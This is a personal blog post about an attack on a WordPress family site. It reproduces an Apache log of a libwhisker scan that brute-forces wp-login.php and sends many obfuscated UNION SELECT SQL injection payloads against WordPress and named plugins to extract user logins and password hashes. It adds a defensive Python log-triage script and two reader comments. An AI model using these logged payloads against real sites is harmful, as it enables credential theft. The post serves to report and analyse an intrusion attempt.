Le portail de la famille Duretz

A libwhisker attack

This site has been attacked from a server in Latvia. Nothing serious, but this is the second time this month.

You can take a look at the following Apache log.

94.247.3.38 - - [13/Jan/2009:14:09:56 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:57 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:59 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:59 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:01 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:01 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:02 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:02 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:04 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:04 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:05 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:05 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:07 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:07 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:08 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:08 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:09 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:09 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:11 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:13 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:15 +0100] "GET /index.php?feed=rss2&p=11/**/union/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a),2/**/from/**/wp_users/**/where/**/user_id=1/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:17 +0100] "GET /index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1" 200 14673 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:24 +0100] "GET /index.php?exact=1&sentence=1&s=%a3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1" 200 14673 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:25 +0100] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:25 +0100] "GET /index.php?cat=%2527%20UNION%20SELECT%20CONCAT(0x3a,user_login,0x3a,user_pass,0x3a)%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:26 +0100] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:27 +0100] "GET /wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(0x3a,user_login,0x3a,user_pass,0x3a)+FROM+wp_users-- HTTP/1.1" 404 16231 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:28 +0100] "GET /wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4+from+wp_users--&display=plain HTTP/1.1" 404 16247 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:29 +0100] "GET /wp-content/plugins/wp-download/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from/**/wp_users/* HTTP/1.1" 404 16259 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:30 +0100] "GET /index.php?page_id=13&album=lala&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201 HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:31 +0100] "GET /forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1" 404 16185 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:32 +0100] "GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1" 404 16173 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:33 +0100] "GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x3a,user_login,0x3a,user_pass,0x3a),0,0,0,0,0/**/FROM/**/wp_users/* HTTP/1.1" 404 16197 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:34 +0100] "GET /wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users HTTP/1.1" 404 16263 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:35 +0100] "GET /wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x3a,user_login,0x3a,user_pass,0x3a),concat(0x3a,user_login,0x3a,user_pass,0x3a),4,5/**/FROM/**/wp_users HTTP/1.1" 404 16285 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:36 +0100] "GET /wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null,null,null,null%20%20from%20wp_users HTTP/1.1" 404 16357 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:40 +0100] "GET /wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x3a,user_login,0x3a,user_pass,0x3a)%20from%20wp_users HTTP/1.1" 404 16211 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:41 +0100] "GET /wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6,7%20from%20wp_users-- HTTP/1.1" 404 16241 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:42 +0100] "GET /wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6%20from%20wp_users-- HTTP/1.1" 404 16251 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:43 +0100] "GET /index.php?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null+from+wp_tbv_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:44 +0100] "GET / HTTP/1.1" 200 16299 "-" "Mozilla (libwhisker/2.4)"

These requests were made with libwhisker. They were sent to the login page, without success, or to WordPress plugins I did not install. They also tried SQL injections, again without success.
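An added example, not part of the original post: a small Python triage of this log that counts failed wp-login.php POSTs per client and flags UNION SELECT probes after undoing the URL encoding and /**/ comment padding seen above. The function names and the threshold are assumptions; the sample lines are copied from the log above.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" format: ip, identity, user, [time], "request", status, size, "referer", "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>.*) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
UNION_RE = re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)
FAILED_LOGIN_THRESHOLD = 3  # assumed value for this small sample; tune per site

def normalise(url):
    """Undo the obfuscation used in the log: percent-encoding (decoded twice,
    for %2527), '+' as space, and /**/ comments standing in for whitespace."""
    return re.sub(r"/\*.*?\*/", " ", unquote_plus(unquote_plus(url)))

def analyse(lines):
    failed, redirects, sqli, agents = Counter(), [], [], set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, path, status = m["ip"], m["url"].split("?")[0], int(m["status"])
        if "libwhisker" in m["ua"].lower():
            agents.add(ip)
        if m["method"] == "POST" and path == "/wp-login.php":
            # WordPress redirects (302) after a successful login and returns 200 otherwise.
            if status == 302:
                redirects.append(ip)
            else:
                failed[ip] += 1
        if UNION_RE.search(normalise(m["url"])):
            sqli.append((ip, path, status))
    return {
        "scanner_ips": agents,
        "bruteforce_ips": {ip for ip, n in failed.items() if n >= FAILED_LOGIN_THRESHOLD},
        "login_redirects": redirects,
        "sqli_probes": sqli,
        "sqli_on_live_urls": [s for s in sqli if s[2] != 404],
    }

# Sample: entries copied from the log above (the 14:09:58 POST appears three times there).
POST = '94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"'
SAMPLE = [POST] * 3 + [
    '94.247.3.38 - - [13/Jan/2009:14:10:25 +0100] "GET /index.php?cat=%2527%20UNION%20SELECT%20CONCAT(0x3a,user_login,0x3a,user_pass,0x3a)%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"',
    '94.247.3.38 - - [13/Jan/2009:14:10:29 +0100] "GET /wp-content/plugins/wp-download/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from/**/wp_users/* HTTP/1.1" 404 16259 "-" "Mozilla (libwhisker/2.4)"',
    '94.247.3.38 - - [13/Jan/2009:14:10:17 +0100] "GET /index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1" 200 14673 "-" "Mozilla (libwhisker/2.4)"',
]
REPORT = analyse(SAMPLE)
```

Probes answered with something other than 404 reached a URL that exists on the site and are the ones to check first; a 200 alone does not mean the injection worked.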


2 Comments to A libwhisker attack

  1. Laurent Duretz
    21st January 2009 at 1:11 PM | Permalink

    Hi Xavier,

    I don’t ban IP addresses on my server because I never know who is using it.

    I found this site which is talking about security.

    Regards,

    Laurent

  2. 20th January 2009 at 8:57 AM | Permalink

    Hi
    I get trouble with 94.247.3.38.
    I try many times to hack my web site with SQL injection.
    I think I didn’t manage to crack my password, but they try.
    Do you know how to ban this IP from my visitor?
    Do you know which plugin is weak or poor for security?

    Thanks for your help.
    Please contact me by email.

    xavier
